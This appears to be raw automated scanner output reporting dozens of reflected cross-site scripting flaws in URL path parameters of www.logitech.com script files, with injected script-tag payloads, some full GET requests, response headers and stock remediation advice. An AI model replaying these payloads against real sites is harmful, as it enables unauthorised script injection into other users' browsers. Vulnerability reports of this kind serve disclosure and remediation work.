<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5ba0"><script>alert(1)</script>320f2c09a9b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /javascript/v2/cmn/lib/pluginsa5ba0"><script>alert(1)</script>320f2c09a9b/third-party/jquery.form.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 410af"><script>alert(1)</script>e53de1fafe5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /javascript/v2/cmn/lib/plugins/third-party410af"><script>alert(1)</script>e53de1fafe5/jquery.form.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c8a2</script><script>alert(1)</script>374eae719 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2/cmn/lib/plugins/third-party2c8a2</script><script>alert(1)</script>374eae719/jquery.form.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9f94</script><script>alert(1)</script>0af768d690b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2/cmn/lib/plugins/third-party/jquery.form.jsa9f94</script><script>alert(1)</script>0af768d690b HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31002"><script>alert(1)</script>1056ed6cec6 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /javascript/v2/cmn/lib/plugins/third-party/jquery.form.js31002"><script>alert(1)</script>1056ed6cec6 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87ee6"><script>alert(1)</script>dcb612d218f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c825</script><script>alert(1)</script>4ff6168f777 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 323b8</script><script>alert(1)</script>80812cb0568 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 372da"><script>alert(1)</script>bb109c6c5ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55c8f</script><script>alert(1)</script>a6c353abf08 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b663"><script>alert(1)</script>64b1bb8318a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78b32</script><script>alert(1)</script>78dff4aeca0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81002"><script>alert(1)</script>3fd4b906b49 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c45a1</script><script>alert(1)</script>88c00df3337 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a54b0"><script>alert(1)</script>cde77d1ee94 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19db2</script><script>alert(1)</script>695015f7848 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc238"><script>alert(1)</script>67cc109f5bf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 813bb</script><script>alert(1)</script>2a0a1391059 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1977f"><script>alert(1)</script>3c7c68df530 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de16b"><script>alert(1)</script>315de1bbf9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ae85</script><script>alert(1)</script>fa0b484dad3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4be97</script><script>alert(1)</script>8f4c7088ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 837bf"><script>alert(1)</script>8f2abf71d2f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d77de"><script>alert(1)</script>3a4aa657c25 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a75f5</script><script>alert(1)</script>864e6f3a05 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccf6e"><script>alert(1)</script>d1a3b0b565 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42588</script><script>alert(1)</script>98e683c253c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68097"><script>alert(1)</script>3e7cab2e76d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3388e</script><script>alert(1)</script>e1dbfd0948e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4475</script><script>alert(1)</script>05fbdb4dd90 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deba8"><script>alert(1)</script>693004feab3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 997bc</script><script>alert(1)</script>72f7a6d99e0 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f043c"><script>alert(1)</script>8b457fe3ef5 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64e7a</script><script>alert(1)</script>06c0a521b5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c308"><script>alert(1)</script>42aaaf488ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6347</script><script>alert(1)</script>cef05b1da19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b38"><script>alert(1)</script>dc5299f0f93 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb64a</script><script>alert(1)</script>fef466280d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b9ad"><script>alert(1)</script>29beead287d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3a81"><script>alert(1)</script>919b8e82fbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b213</script><script>alert(1)</script>bc83ccc563c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e850d"><script>alert(1)</script>b9fb5e8b3ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14eb6</script><script>alert(1)</script>9b6df315246 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36796"><script>alert(1)</script>ecefde0858e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d244</script><script>alert(1)</script>9ce78a8c56f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85dae</script><script>alert(1)</script>e8235d28509 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 875b7"><script>alert(1)</script>793fd52dd48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b566d</script><script>alert(1)</script>5cf059ccbc5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3fd9"><script>alert(1)</script>bd58579f9b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6424d"><script>alert(1)</script>0ef66ee8c62 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6684d</script><script>alert(1)</script>a2a5db96952 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b9d5</script><script>alert(1)</script>8a2ec6c6806 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94c55"><script>alert(1)</script>7a1a5c22abb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a7f9"><script>alert(1)</script>ef0ea1770a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5430d</script><script>alert(1)</script>a8adc6fb95b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0d10</script><script>alert(1)</script>de2c629d9c8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be203"><script>alert(1)</script>21de790e2e5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73523"><script>alert(1)</script>afcb2fd66e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /javascript73523"><script>alert(1)</script>afcb2fd66e5/v2/subnavigation.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c87c</script><script>alert(1)</script>7e6501a2f73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript6c87c</script><script>alert(1)</script>7e6501a2f73/v2/subnavigation.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5bfa</script><script>alert(1)</script>41287ec6419 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2e5bfa</script><script>alert(1)</script>41287ec6419/subnavigation.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f69a0"><script>alert(1)</script>edb31177f64 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /javascript/v2f69a0"><script>alert(1)</script>edb31177f64/subnavigation.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b5f8"><script>alert(1)</script>a7fd884f602 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /javascript/v2/subnavigation.js1b5f8"><script>alert(1)</script>a7fd884f602 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:19 GMT Connection: close
